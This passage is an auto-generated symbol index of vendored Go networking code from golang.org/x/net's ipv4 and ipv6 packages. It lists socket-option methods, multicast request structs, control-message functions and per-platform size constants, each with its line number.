(line 40) | func (so *sockOpt) setBPF(c *socket.Conn, f []bpf.RawInstruction) error { FILE: vendor/golang.org/x/net/ipv4/sys_aix.go constant sockoptReceiveInterface (line 21) | sockoptReceiveInterface = unix.IP_RECVINTERFACE FILE: vendor/golang.org/x/net/ipv4/sys_asmreq.go method setIPMreq (line 19) | func (so *sockOpt) setIPMreq(c *socket.Conn, ifi *net.Interface, grp net... method getMulticastIf (line 28) | func (so *sockOpt) getMulticastIf(c *socket.Conn) (*net.Interface, error) { method setMulticastIf (line 40) | func (so *sockOpt) setMulticastIf(c *socket.Conn, ifi *net.Interface) er... function setIPMreqInterface (line 50) | func setIPMreqInterface(mreq *ipMreq, ifi *net.Interface) error { function netIP4ToInterface (line 75) | func netIP4ToInterface(ip net.IP) (*net.Interface, error) { function netInterfaceToIP4 (line 101) | func netInterfaceToIP4(ifi *net.Interface) (net.IP, error) { FILE: vendor/golang.org/x/net/ipv4/sys_asmreq_stub.go method setIPMreq (line 15) | func (so *sockOpt) setIPMreq(c *socket.Conn, ifi *net.Interface, grp net... method getMulticastIf (line 19) | func (so *sockOpt) getMulticastIf(c *socket.Conn) (*net.Interface, error) { method setMulticastIf (line 23) | func (so *sockOpt) setMulticastIf(c *socket.Conn, ifi *net.Interface) er... FILE: vendor/golang.org/x/net/ipv4/sys_asmreqn.go method getIPMreqn (line 18) | func (so *sockOpt) getIPMreqn(c *socket.Conn) (*net.Interface, error) { method setIPMreqn (line 34) | func (so *sockOpt) setIPMreqn(c *socket.Conn, ifi *net.Interface, grp ne... FILE: vendor/golang.org/x/net/ipv4/sys_asmreqn_stub.go method getIPMreqn (line 15) | func (so *sockOpt) getIPMreqn(c *socket.Conn) (*net.Interface, error) { method setIPMreqn (line 19) | func (so *sockOpt) setIPMreqn(c *socket.Conn, ifi *net.Interface, grp ne... FILE: vendor/golang.org/x/net/ipv4/sys_bpf.go method setAttachFilter (line 17) | func (so *sockOpt) setAttachFilter(c *socket.Conn, f []bpf.RawInstructio... FILE: vendor/golang.org/x/net/ipv4/sys_bpf_stub.go method setAttachFilter (line 14) | func (so *sockOpt) setAttachFilter(c *socket.Conn, f []bpf.RawInstructio... FILE: vendor/golang.org/x/net/ipv4/sys_bsd.go constant sockoptReceiveInterface (line 19) | sockoptReceiveInterface = unix.IP_RECVIF FILE: vendor/golang.org/x/net/ipv4/sys_darwin.go constant sockoptReceiveInterface (line 18) | sockoptReceiveInterface = unix.IP_RECVIF method setIfindex (line 49) | func (pi *inetPktinfo) setIfindex(i int) { method setGroup (line 53) | func (gr *groupReq) setGroup(grp net.IP) { method setSourceGroup (line 60) | func (gsr *groupSourceReq) setSourceGroup(grp, src net.IP) { FILE: vendor/golang.org/x/net/ipv4/sys_dragonfly.go constant sockoptReceiveInterface (line 17) | sockoptReceiveInterface = unix.IP_RECVIF FILE: vendor/golang.org/x/net/ipv4/sys_freebsd.go constant sockoptReceiveInterface (line 20) | sockoptReceiveInterface = unix.IP_RECVIF function init (line 48) | func init() { method setGroup (line 64) | func (gr *groupReq) setGroup(grp net.IP) { method setSourceGroup (line 71) | func (gsr *groupSourceReq) setSourceGroup(grp, src net.IP) { FILE: vendor/golang.org/x/net/ipv4/sys_linux.go method setIfindex (line 44) | func (pi *inetPktinfo) setIfindex(i int) { method setGroup (line 48) | func (gr *groupReq) setGroup(grp net.IP) { method setSourceGroup (line 54) | func (gsr *groupSourceReq) setSourceGroup(grp, src net.IP) { FILE: vendor/golang.org/x/net/ipv4/sys_solaris.go constant sockoptReceiveInterface (line 18) | sockoptReceiveInterface = unix.IP_RECVIF method setIfindex (line 44) | func (pi *inetPktinfo) setIfindex(i int) { method setGroup (line 48) | func (gr *groupReq) setGroup(grp net.IP) { method setSourceGroup (line 54) | func (gsr *groupSourceReq) setSourceGroup(grp, src net.IP) { FILE: vendor/golang.org/x/net/ipv4/sys_ssmreq.go method setGroupReq (line 16) | func (so *sockOpt) setGroupReq(c *socket.Conn, ifi *net.Interface, grp n... method setGroupSourceReq (line 35) | func (so *sockOpt) setGroupSourceReq(c *socket.Conn, ifi *net.Interface,... FILE: vendor/golang.org/x/net/ipv4/sys_ssmreq_stub.go method setGroupReq (line 15) | func (so *sockOpt) setGroupReq(c *socket.Conn, ifi *net.Interface, grp n... method setGroupSourceReq (line 19) | func (so *sockOpt) setGroupSourceReq(c *socket.Conn, ifi *net.Interface,... FILE: vendor/golang.org/x/net/ipv4/sys_windows.go constant sizeofIPMreq (line 15) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 16) | sizeofIPMreqSource = 0xc type ipMreq (line 19) | type ipMreq struct type ipMreqSource (line 24) | type ipMreqSource struct FILE: vendor/golang.org/x/net/ipv4/sys_zos.go method setIfindex (line 37) | func (pi *inetPktinfo) setIfindex(i int) { method setGroup (line 41) | func (gr *groupReq) setGroup(grp net.IP) { method setSourceGroup (line 48) | func (gsr *groupSourceReq) setSourceGroup(grp, src net.IP) { FILE: vendor/golang.org/x/net/ipv4/zsys_aix_ppc64.go constant sizeofIPMreq (line 10) | sizeofIPMreq = 0x8 type ipMreq (line 13) | type ipMreq struct FILE: vendor/golang.org/x/net/ipv4/zsys_darwin.go constant sizeofSockaddrStorage (line 7) | sizeofSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofInetPktinfo (line 9) | sizeofInetPktinfo = 0xc constant sizeofIPMreq (line 11) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 12) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 13) | sizeofGroupReq = 0x84 constant sizeofGroupSourceReq (line 14) | sizeofGroupSourceReq = 0x104 type sockaddrStorage (line 17) | type sockaddrStorage struct type sockaddrInet (line 25) | type sockaddrInet struct type inetPktinfo (line 33) | type inetPktinfo struct type ipMreq (line 39) | type ipMreq struct type ipMreqSource (line 44) | type ipMreqSource struct type groupReq (line 50) | type groupReq struct type groupSourceReq (line 55) | type groupSourceReq struct FILE: vendor/golang.org/x/net/ipv4/zsys_dragonfly.go constant sizeofIPMreq (line 7) | sizeofIPMreq = 0x8 type ipMreq (line 10) | type ipMreq struct FILE: vendor/golang.org/x/net/ipv4/zsys_freebsd_386.go constant sizeofSockaddrStorage (line 7) | sizeofSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofIPMreq (line 10) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 11) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 12) | sizeofGroupReq = 0x84 constant sizeofGroupSourceReq (line 13) | sizeofGroupSourceReq = 0x104 type sockaddrStorage (line 16) | type sockaddrStorage struct type sockaddrInet (line 24) | type sockaddrInet struct type ipMreq (line 32) | type ipMreq struct type ipMreqSource (line 37) | type ipMreqSource struct type groupReq (line 43) | type groupReq struct type groupSourceReq (line 48) | type groupSourceReq struct FILE: vendor/golang.org/x/net/ipv4/zsys_freebsd_amd64.go constant sizeofSockaddrStorage (line 7) | sizeofSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofIPMreq (line 10) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 11) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 12) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 13) | sizeofGroupSourceReq = 0x108 type sockaddrStorage (line 16) | type sockaddrStorage struct type sockaddrInet (line 24) | type sockaddrInet struct type ipMreq (line 32) | type ipMreq struct type ipMreqSource (line 37) | type ipMreqSource struct type groupReq (line 43) | type groupReq struct type groupSourceReq (line 49) | type groupSourceReq struct FILE: vendor/golang.org/x/net/ipv4/zsys_freebsd_arm.go constant sizeofSockaddrStorage (line 7) | sizeofSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofIPMreq (line 10) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 11) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 12) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 13) | sizeofGroupSourceReq = 0x108 type sockaddrStorage (line 16) | type sockaddrStorage struct type sockaddrInet (line 24) | type sockaddrInet struct type ipMreq (line 32) | type ipMreq struct type ipMreqSource (line 37) | type ipMreqSource struct type groupReq (line 43) | type groupReq struct type groupSourceReq (line 49) | type groupSourceReq struct FILE: vendor/golang.org/x/net/ipv4/zsys_freebsd_arm64.go constant sizeofSockaddrStorage (line 7) | sizeofSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofIPMreq (line 10) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 11) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 12) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 13) | sizeofGroupSourceReq = 0x108 type sockaddrStorage (line 16) | type sockaddrStorage struct type sockaddrInet (line 24) | type sockaddrInet struct type ipMreq (line 32) | type ipMreq struct type ipMreqSource (line 37) | type ipMreqSource struct type groupReq (line 43) | type groupReq struct type groupSourceReq (line 48) | type groupSourceReq struct FILE: vendor/golang.org/x/net/ipv4/zsys_freebsd_riscv64.go constant sizeofSockaddrStorage (line 7) | sizeofSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofIPMreq (line 10) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 11) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 12) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 13) | sizeofGroupSourceReq = 0x108 type sockaddrStorage (line 16) | type sockaddrStorage struct type sockaddrInet (line 24) | type sockaddrInet struct type ipMreq (line 32) | type ipMreq struct type ipMreqSource (line 37) | type ipMreqSource struct type groupReq (line 43) | type groupReq struct type groupSourceReq (line 48) | type groupSourceReq struct FILE: vendor/golang.org/x/net/ipv4/zsys_linux_386.go constant sizeofKernelSockaddrStorage (line 7) | sizeofKernelSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofInetPktinfo (line 9) | sizeofInetPktinfo = 0xc constant sizeofSockExtendedErr (line 10) | sizeofSockExtendedErr = 0x10 constant sizeofIPMreq (line 12) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 13) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 14) | sizeofGroupReq = 0x84 constant sizeofGroupSourceReq (line 15) | sizeofGroupSourceReq = 0x104 constant sizeofICMPFilter (line 17) | sizeofICMPFilter = 0x4 type kernelSockaddrStorage (line 20) | type kernelSockaddrStorage struct type sockaddrInet (line 25) | type sockaddrInet struct type inetPktinfo (line 32) | type inetPktinfo struct type sockExtendedErr (line 38) | type sockExtendedErr struct type ipMreq (line 48) | type ipMreq struct type ipMreqSource (line 53) | type ipMreqSource struct type groupReq (line 59) | type groupReq struct type groupSourceReq (line 64) | type groupSourceReq struct type icmpFilter (line 70) | type icmpFilter struct FILE: vendor/golang.org/x/net/ipv4/zsys_linux_amd64.go constant sizeofKernelSockaddrStorage (line 7) | sizeofKernelSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofInetPktinfo (line 9) | sizeofInetPktinfo = 0xc constant sizeofSockExtendedErr (line 10) | sizeofSockExtendedErr = 0x10 constant sizeofIPMreq (line 12) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 13) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 14) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 15) | sizeofGroupSourceReq = 0x108 constant sizeofICMPFilter (line 17) | sizeofICMPFilter = 0x4 type kernelSockaddrStorage (line 20) | type kernelSockaddrStorage struct type sockaddrInet (line 25) | type sockaddrInet struct type inetPktinfo (line 32) | type inetPktinfo struct type sockExtendedErr (line 38) | type sockExtendedErr struct type ipMreq (line 48) | type ipMreq struct type ipMreqSource (line 53) | type ipMreqSource struct type groupReq (line 59) | type groupReq struct type groupSourceReq (line 65) | type groupSourceReq struct type icmpFilter (line 72) | type icmpFilter struct FILE: vendor/golang.org/x/net/ipv4/zsys_linux_arm.go constant sizeofKernelSockaddrStorage (line 7) | sizeofKernelSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofInetPktinfo (line 9) | sizeofInetPktinfo = 0xc constant sizeofSockExtendedErr (line 10) | sizeofSockExtendedErr = 0x10 constant sizeofIPMreq (line 12) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 13) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 14) | sizeofGroupReq = 0x84 constant sizeofGroupSourceReq (line 15) | sizeofGroupSourceReq = 0x104 constant sizeofICMPFilter (line 17) | sizeofICMPFilter = 0x4 type kernelSockaddrStorage (line 20) | type kernelSockaddrStorage struct type sockaddrInet (line 25) | type sockaddrInet struct type inetPktinfo (line 32) | type inetPktinfo struct type sockExtendedErr (line 38) | type sockExtendedErr struct type ipMreq (line 48) | type ipMreq struct type ipMreqSource (line 53) | type ipMreqSource struct type groupReq (line 59) | type groupReq struct type groupSourceReq (line 64) | type groupSourceReq struct type icmpFilter (line 70) | type icmpFilter struct FILE: vendor/golang.org/x/net/ipv4/zsys_linux_arm64.go constant sizeofKernelSockaddrStorage (line 7) | sizeofKernelSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofInetPktinfo (line 9) | sizeofInetPktinfo = 0xc constant sizeofSockExtendedErr (line 10) | sizeofSockExtendedErr = 0x10 constant sizeofIPMreq (line 12) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 13) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 14) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 15) | sizeofGroupSourceReq = 0x108 constant sizeofICMPFilter (line 17) | sizeofICMPFilter = 0x4 type kernelSockaddrStorage (line 20) | type kernelSockaddrStorage struct type sockaddrInet (line 25) | type sockaddrInet struct type inetPktinfo (line 32) | type inetPktinfo struct type sockExtendedErr (line 38) | type sockExtendedErr struct type ipMreq (line 48) | type ipMreq struct type ipMreqSource (line 53) | type ipMreqSource struct type groupReq (line 59) | type groupReq struct type groupSourceReq (line 65) | type groupSourceReq struct type icmpFilter (line 72) | type icmpFilter struct FILE: vendor/golang.org/x/net/ipv4/zsys_linux_loong64.go constant sizeofKernelSockaddrStorage (line 9) | sizeofKernelSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 10) | sizeofSockaddrInet = 0x10 constant sizeofInetPktinfo (line 11) | sizeofInetPktinfo = 0xc constant sizeofSockExtendedErr (line 12) | sizeofSockExtendedErr = 0x10 constant sizeofIPMreq (line 14) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 15) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 16) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 17) | sizeofGroupSourceReq = 0x108 constant sizeofICMPFilter (line 19) | sizeofICMPFilter = 0x4 type kernelSockaddrStorage (line 22) | type kernelSockaddrStorage struct type sockaddrInet (line 27) | type sockaddrInet struct type inetPktinfo (line 34) | type inetPktinfo struct type sockExtendedErr (line 40) | type sockExtendedErr struct type ipMreq (line 50) | type ipMreq struct type ipMreqSource (line 55) | type ipMreqSource struct type groupReq (line 61) | type groupReq struct type groupSourceReq (line 67) | type groupSourceReq struct type icmpFilter (line 74) | type icmpFilter struct FILE: vendor/golang.org/x/net/ipv4/zsys_linux_mips.go constant sizeofKernelSockaddrStorage (line 7) | sizeofKernelSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofInetPktinfo (line 9) | sizeofInetPktinfo = 0xc constant sizeofSockExtendedErr (line 10) | sizeofSockExtendedErr = 0x10 constant sizeofIPMreq (line 12) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 13) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 14) | sizeofGroupReq = 0x84 constant sizeofGroupSourceReq (line 15) | sizeofGroupSourceReq = 0x104 constant sizeofICMPFilter (line 17) | sizeofICMPFilter = 0x4 type kernelSockaddrStorage (line 20) | type kernelSockaddrStorage struct type sockaddrInet (line 25) | type sockaddrInet struct type inetPktinfo (line 32) | type inetPktinfo struct type sockExtendedErr (line 38) | type sockExtendedErr struct type ipMreq (line 48) | type ipMreq struct type ipMreqSource (line 53) | type ipMreqSource struct type groupReq (line 59) | type groupReq struct type groupSourceReq (line 64) | type groupSourceReq struct type icmpFilter (line 70) | type icmpFilter struct FILE: vendor/golang.org/x/net/ipv4/zsys_linux_mips64.go constant sizeofKernelSockaddrStorage (line 7) | sizeofKernelSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofInetPktinfo (line 9) | sizeofInetPktinfo = 0xc constant sizeofSockExtendedErr (line 10) | sizeofSockExtendedErr = 0x10 constant sizeofIPMreq (line 12) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 13) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 14) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 15) | sizeofGroupSourceReq = 0x108 constant sizeofICMPFilter (line 17) | sizeofICMPFilter = 0x4 type kernelSockaddrStorage (line 20) | type kernelSockaddrStorage struct type sockaddrInet (line 25) | type sockaddrInet struct type inetPktinfo (line 32) | type inetPktinfo struct type sockExtendedErr (line 38) | type sockExtendedErr struct type ipMreq (line 48) | type ipMreq struct type ipMreqSource (line 53) | type ipMreqSource struct type groupReq (line 59) | type groupReq struct type groupSourceReq (line 65) | type groupSourceReq struct type icmpFilter (line 72) | type icmpFilter struct FILE: vendor/golang.org/x/net/ipv4/zsys_linux_mips64le.go constant sizeofKernelSockaddrStorage (line 7) | sizeofKernelSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofInetPktinfo (line 9) | sizeofInetPktinfo = 0xc constant sizeofSockExtendedErr (line 10) | sizeofSockExtendedErr = 0x10 constant sizeofIPMreq (line 12) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 13) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 14) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 15) | sizeofGroupSourceReq = 0x108 constant sizeofICMPFilter (line 17) | sizeofICMPFilter = 0x4 type kernelSockaddrStorage (line 20) | type kernelSockaddrStorage struct type sockaddrInet (line 25) | type sockaddrInet struct type inetPktinfo (line 32) | type inetPktinfo struct type sockExtendedErr (line 38) | type sockExtendedErr struct type ipMreq (line 48) | type ipMreq struct type ipMreqSource (line 53) | type ipMreqSource struct type groupReq (line 59) | type groupReq struct type groupSourceReq (line 65) | type groupSourceReq struct type icmpFilter (line 72) | type icmpFilter struct FILE: vendor/golang.org/x/net/ipv4/zsys_linux_mipsle.go constant sizeofKernelSockaddrStorage (line 7) | sizeofKernelSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofInetPktinfo (line 9) | sizeofInetPktinfo = 0xc constant sizeofSockExtendedErr (line 10) | sizeofSockExtendedErr = 0x10 constant sizeofIPMreq (line 12) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 13) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 14) | sizeofGroupReq = 0x84 constant sizeofGroupSourceReq (line 15) | sizeofGroupSourceReq = 0x104 constant sizeofICMPFilter (line 17) | sizeofICMPFilter = 0x4 type kernelSockaddrStorage (line 20) | type kernelSockaddrStorage struct type sockaddrInet (line 25) | type sockaddrInet struct type inetPktinfo (line 32) | type inetPktinfo struct type sockExtendedErr (line 38) | type sockExtendedErr struct type ipMreq (line 48) | type ipMreq struct type ipMreqSource (line 53) | type ipMreqSource struct type groupReq (line 59) | type groupReq struct type groupSourceReq (line 64) | type groupSourceReq struct type icmpFilter (line 70) | type icmpFilter struct FILE: vendor/golang.org/x/net/ipv4/zsys_linux_ppc.go constant sizeofKernelSockaddrStorage (line 7) | sizeofKernelSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofInetPktinfo (line 9) | sizeofInetPktinfo = 0xc constant sizeofSockExtendedErr (line 10) | sizeofSockExtendedErr = 0x10 constant sizeofIPMreq (line 12) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 13) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 14) | sizeofGroupReq = 0x84 constant sizeofGroupSourceReq (line 15) | sizeofGroupSourceReq = 0x104 constant sizeofICMPFilter (line 17) | sizeofICMPFilter = 0x4 type kernelSockaddrStorage (line 20) | type kernelSockaddrStorage struct type sockaddrInet (line 25) | type sockaddrInet struct type inetPktinfo (line 32) | type inetPktinfo struct type sockExtendedErr (line 38) | type sockExtendedErr struct type ipMreq (line 48) | type ipMreq struct type ipMreqSource (line 53) | type ipMreqSource struct type groupReq (line 59) | type groupReq struct type groupSourceReq (line 64) | type groupSourceReq struct type icmpFilter (line 70) | type icmpFilter struct FILE: vendor/golang.org/x/net/ipv4/zsys_linux_ppc64.go constant sizeofKernelSockaddrStorage (line 7) | sizeofKernelSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofInetPktinfo (line 9) | sizeofInetPktinfo = 0xc constant sizeofSockExtendedErr (line 10) | sizeofSockExtendedErr = 0x10 constant sizeofIPMreq (line 12) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 13) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 14) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 15) | sizeofGroupSourceReq = 0x108 constant sizeofICMPFilter (line 17) | sizeofICMPFilter = 0x4 type kernelSockaddrStorage (line 20) | type kernelSockaddrStorage struct type sockaddrInet (line 25) | type sockaddrInet struct type inetPktinfo (line 32) | type inetPktinfo struct type sockExtendedErr (line 38) | type sockExtendedErr struct type ipMreq (line 48) | type ipMreq struct type ipMreqSource (line 53) | type ipMreqSource struct type groupReq (line 59) | type groupReq struct type groupSourceReq (line 65) | type groupSourceReq struct type icmpFilter (line 72) | type icmpFilter struct FILE: vendor/golang.org/x/net/ipv4/zsys_linux_ppc64le.go constant sizeofKernelSockaddrStorage (line 7) | sizeofKernelSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofInetPktinfo (line 9) | sizeofInetPktinfo = 0xc constant sizeofSockExtendedErr (line 10) | sizeofSockExtendedErr = 0x10 constant sizeofIPMreq (line 12) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 13) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 14) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 15) | sizeofGroupSourceReq = 0x108 constant sizeofICMPFilter (line 17) | sizeofICMPFilter = 0x4 type kernelSockaddrStorage (line 20) | type kernelSockaddrStorage struct type sockaddrInet (line 25) | type sockaddrInet struct type inetPktinfo (line 32) | type inetPktinfo struct type sockExtendedErr (line 38) | type sockExtendedErr struct type ipMreq (line 48) | type ipMreq struct type ipMreqSource (line 53) | type ipMreqSource struct type groupReq (line 59) | type groupReq struct type groupSourceReq (line 65) | type groupSourceReq struct type icmpFilter (line 72) | type icmpFilter struct FILE: vendor/golang.org/x/net/ipv4/zsys_linux_riscv64.go constant sizeofKernelSockaddrStorage (line 9) | sizeofKernelSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 10) | sizeofSockaddrInet = 0x10 constant sizeofInetPktinfo (line 11) | sizeofInetPktinfo = 0xc constant sizeofSockExtendedErr (line 12) | sizeofSockExtendedErr = 0x10 constant sizeofIPMreq (line 14) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 15) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 16) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 17) | sizeofGroupSourceReq = 0x108 constant sizeofICMPFilter (line 19) | sizeofICMPFilter = 0x4 type kernelSockaddrStorage (line 22) | type kernelSockaddrStorage struct type sockaddrInet (line 27) | type sockaddrInet struct type inetPktinfo (line 34) | type inetPktinfo struct type sockExtendedErr (line 40) | type sockExtendedErr struct type ipMreq (line 50) | type ipMreq struct type ipMreqSource (line 55) | type ipMreqSource struct type groupReq (line 61) | type groupReq struct type groupSourceReq (line 67) | type groupSourceReq struct type icmpFilter (line 74) | type icmpFilter struct FILE: vendor/golang.org/x/net/ipv4/zsys_linux_s390x.go constant sizeofKernelSockaddrStorage (line 7) | sizeofKernelSockaddrStorage = 0x80 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofInetPktinfo (line 9) | sizeofInetPktinfo = 0xc constant sizeofSockExtendedErr (line 10) | sizeofSockExtendedErr = 0x10 constant sizeofIPMreq (line 12) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 13) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 14) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 15) | sizeofGroupSourceReq = 0x108 constant sizeofICMPFilter (line 17) | sizeofICMPFilter = 0x4 type kernelSockaddrStorage (line 20) | type kernelSockaddrStorage struct type sockaddrInet (line 25) | type sockaddrInet struct type inetPktinfo (line 32) | type inetPktinfo struct type sockExtendedErr (line 38) | type sockExtendedErr struct type ipMreq (line 48) | type ipMreq struct type ipMreqSource (line 53) | type ipMreqSource struct type groupReq (line 59) | type groupReq struct type groupSourceReq (line 65) | type groupSourceReq struct type icmpFilter (line 72) | type icmpFilter struct FILE: vendor/golang.org/x/net/ipv4/zsys_netbsd.go constant sizeofIPMreq (line 7) | sizeofIPMreq = 0x8 type ipMreq (line 10) | type ipMreq struct FILE: vendor/golang.org/x/net/ipv4/zsys_openbsd.go constant sizeofIPMreq (line 7) | sizeofIPMreq = 0x8 type ipMreq (line 10) | type ipMreq struct FILE: vendor/golang.org/x/net/ipv4/zsys_solaris.go constant sizeofSockaddrStorage (line 7) | sizeofSockaddrStorage = 0x100 constant sizeofSockaddrInet (line 8) | sizeofSockaddrInet = 0x10 constant sizeofInetPktinfo (line 9) | sizeofInetPktinfo = 0xc constant sizeofIPMreq (line 11) | sizeofIPMreq = 0x8 constant sizeofIPMreqSource (line 12) | sizeofIPMreqSource = 0xc constant sizeofGroupReq (line 13) | sizeofGroupReq = 0x104 constant sizeofGroupSourceReq (line 14) | sizeofGroupSourceReq = 0x204 type sockaddrStorage (line 17) | type sockaddrStorage struct type sockaddrInet (line 24) | type sockaddrInet struct type inetPktinfo (line 31) | type inetPktinfo struct type ipMreq (line 37) | type ipMreq struct type ipMreqSource (line 42) | type ipMreqSource struct type groupReq (line 48) | type groupReq struct type groupSourceReq (line 53) | type groupSourceReq struct FILE: vendor/golang.org/x/net/ipv4/zsys_zos_s390x.go constant sizeofIPMreq (line 11) | sizeofIPMreq = 8 constant sizeofSockaddrInet4 (line 12) | sizeofSockaddrInet4 = 16 constant sizeofSockaddrStorage (line 13) | sizeofSockaddrStorage = 128 constant sizeofGroupReq (line 14) | sizeofGroupReq = 136 constant sizeofGroupSourceReq (line 15) | sizeofGroupSourceReq = 264 constant sizeofInetPktinfo (line 16) | sizeofInetPktinfo = 8 type sockaddrInet4 (line 19) | type sockaddrInet4 struct type inetPktinfo (line 27) | type inetPktinfo struct type sockaddrStorage (line 32) | type sockaddrStorage struct type groupReq (line 40) | type groupReq struct type groupSourceReq (line 46) | type groupSourceReq struct type ipMreq (line 53) | type ipMreq struct FILE: vendor/golang.org/x/net/ipv6/batch.go method ReadBatch (line 65) | func (c *payloadHandler) ReadBatch(ms []Message, flags int) (int, error) { method WriteBatch (line 96) | func (c *payloadHandler) WriteBatch(ms []Message, flags int) (int, error) { FILE: vendor/golang.org/x/net/ipv6/control.go type rawOpt (line 21) | type rawOpt struct method set (line 26) | func (c *rawOpt) set(f ControlFlags) { c.cflags |= f } method clear (line 27) | func (c *rawOpt) clear(f ControlFlags) { c.cflags &^= f } method isset (line 28) | func (c *rawOpt) isset(f ControlFlags) bool { return c.cflags&f != 0 } type ControlFlags (line 32) | type ControlFlags constant FlagTrafficClass (line 35) | FlagTrafficClass ControlFlags = 1 << iota constant FlagHopLimit (line 36) | FlagHopLimit constant FlagSrc (line 37) | FlagSrc constant FlagDst (line 38) | FlagDst constant FlagInterface (line 39) | FlagInterface constant FlagPathMTU (line 40) | FlagPathMTU constant flagPacketInfo (line 43) | flagPacketInfo = FlagDst | FlagInterface type ControlMessage (line 47) | type ControlMessage struct method String (line 65) | func (cm *ControlMessage) String() string { method Marshal (line 73) | func (cm *ControlMessage) Marshal() []byte { method Parse (line 119) | func (cm *ControlMessage) Parse(b []byte) error { function NewControlMessage (line 149) | func NewControlMessage(cf ControlFlags) []byte { constant ctlTrafficClass (line 173) | ctlTrafficClass = iota constant ctlHopLimit (line 174) | ctlHopLimit constant ctlPacketInfo (line 175) | ctlPacketInfo constant ctlNextHop (line 176) | ctlNextHop constant ctlPathMTU (line 177) | ctlPathMTU constant ctlMax (line 178) | ctlMax type ctlOpt (line 182) | type ctlOpt struct FILE: vendor/golang.org/x/net/ipv6/control_rfc2292_unix.go function marshal2292HopLimit (line 18) | func marshal2292HopLimit(b []byte, cm *ControlMessage) []byte { function marshal2292PacketInfo (line 27) | func marshal2292PacketInfo(b []byte, cm *ControlMessage) []byte { function marshal2292NextHop (line 42) | func marshal2292NextHop(b []byte, cm *ControlMessage) []byte { FILE: 